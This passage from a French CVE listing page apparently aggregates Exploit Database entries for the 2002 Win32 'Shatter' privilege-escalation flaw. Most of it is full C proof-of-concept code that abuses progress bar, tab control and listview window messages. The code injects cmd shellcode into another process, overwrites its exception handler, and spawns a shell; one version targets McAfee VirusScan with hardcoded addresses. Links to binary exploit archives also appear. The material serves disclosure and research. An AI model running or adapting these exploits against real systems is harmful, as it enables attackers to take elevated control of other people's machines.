SEH.......0x%xh\n",sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21687

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Brett Moore
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /*************************************************************************** * Progress Control Shatter exploit * * Demonstrates the use of Progress Control messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * * Local shellcode loads relevant addresses * Try it out against any program with a progress bar * * Based on (and pretty much identical to) * mcafee-shatterseh2.c by * Oliver Lavery <oliver.lavery at sympatico.ca> **************************************************************************** / #include <windows.h> #include <commctrl.h> #include <stdio.h> // Local Cmd Shellcode. BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD 1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="Checking Disk C:\\";// The name of the main window long sehHandler = 0x7fXXXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x7fXXXXXX; // Known Writeable Space Or Global Space void doWrite(HWND hWnd, long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with progress bar messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Done...\n"); return 0; } void doWrite(HWND hWnd, long tByte,long address) { SendMessage( hWnd,(UINT) PBM_SETRANGE,0,MAKELPARAM(tByte , 20)); SendMessage( hWnd,(UINT) PBM_GETRANGE,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_progress32") ==0) { // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n",sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21688

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Oliver Lavery
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * Tab Control Shatter exploit for McAfee A/V products * (or any other program that includes a tab control) * * Demonstrates the use of tab control messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * * Hardcoded addresses are for XP SP 1 * Try it out against any program with a tab control. * Oliver Lavery <oliver.lavery at sympatico.ca> * * Based on (and pretty much identical to) shatterseh2.c by * Brett Moore [ brett moore security-assessment com ] **********************************************************/ #include <windows.h> #include <commctrl.h> #include <stdio.h> // Local Cmd Shellcode. // Added a loadLibrary call to make sure msvcrt.dll is present -- ol BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="VirusScan Status";// The name of the main window long sehHandler = 0x77edXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x77ed7484; // Known Writeable Space Or Global Space // you might want to find a less destructive spot to stick the code, but this works for me --ol void doWrite(HWND hWnd, long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with tabcontrol messages\n"); printf("%% Oliver Lavery.\n\n"); printf("%% based on Shatter SEH code by\n"); printf("%% brett moore security-assessment com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void doWrite(HWND hWnd, long tByte,long address) { SendMessage( hWnd,(UINT) TCM_SETITEMSIZE,0,MAKELPARAM(tByte - 2, 20)); SendMessage( hWnd,(UINT) TCM_GETITEMRECT,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); while ( strcmp(g_classNameBuf, "SysTabControl32") ) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); } if(childhWnd != NULL) { LONG wndStyle = GetWindowLong( (HWND)childhWnd, GWL_STYLE ); wndStyle |= TCS_FIXEDWIDTH ; SetWindowLong( (HWND)childhWnd, GWL_STYLE, wndStyle ); printf("min %d\n", SendMessage( (HWND)childhWnd,(UINT) TCM_SETMINTABWIDTH, 0,(LPARAM)0) ); printf("+ Found tab control..0x%xh\n",childhWnd); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)childhWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n",sehHandler); doWrite((HWND)childhWnd, ((shellcodeaddr) & 0xff),sehHandler); doWrite((HWND)childhWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite((HWND)childhWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)childhWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) childhWnd,(UINT) TCM_GETITEMRECT,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21689

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Brett Moore
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * shatterseh2.c * * Demonstrates the use of listview messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * The 'autofind' feature may not work against all programs. * Insert your own blank lines for readability * Try it out against any program with a listview. * eg: explorer, IE, any file open dialog * Brett Moore [ brett.moore@security-assessment.com ] * www.security-assessment.com **********************************************************/ #include <windows.h> #include <commctrl.h> // Local Cmd Shellcode BYTE exploit[] = "\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc"; long hLVControl,hHdrControl; char tWindow[]="Main Window Title";// The name of the main window long sehHandler = 0x77edXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x0045e000; // Known Writeable Space Or Global Space void doWrite(long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with listview messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); // Find local procedure address hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[8] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void doWrite(long tByte,long address) { SendMessage((HWND) hLVControl,(UINT) LVM_SETCOLUMNWIDTH, 0,MAKELPARAM(tByte, 0)); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = GetNextWindow(hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT); } hLVControl = hWnd; hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0); if(hHdrControl != NULL) { // Found a Listview Window with a Header printf("+ Found listview window..0x%xh\n",hLVControl); printf("+ Found lvheader window..0x%xh\n",hHdrControl); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n",sehHandler); doWrite(((shellcodeaddr) & 0xff),sehHandler); doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21690

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Ovidio Mallo
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21690.rar
Exploit Database EDB-ID : 21691

Date de publication : 2002-08-05 22h00 +00:00
Auteur : anonymous
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21691.zip

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Microsoft>>Windows_2000_terminal_services >> Version *

Références

http://www.ciac.org/ciac/bulletins/n-027.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.securityfocus.com/bid/5927
Tags : vdb-entry, x_refsource_BID
http://getad.chat.ru/
Tags : x_refsource_MISC
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.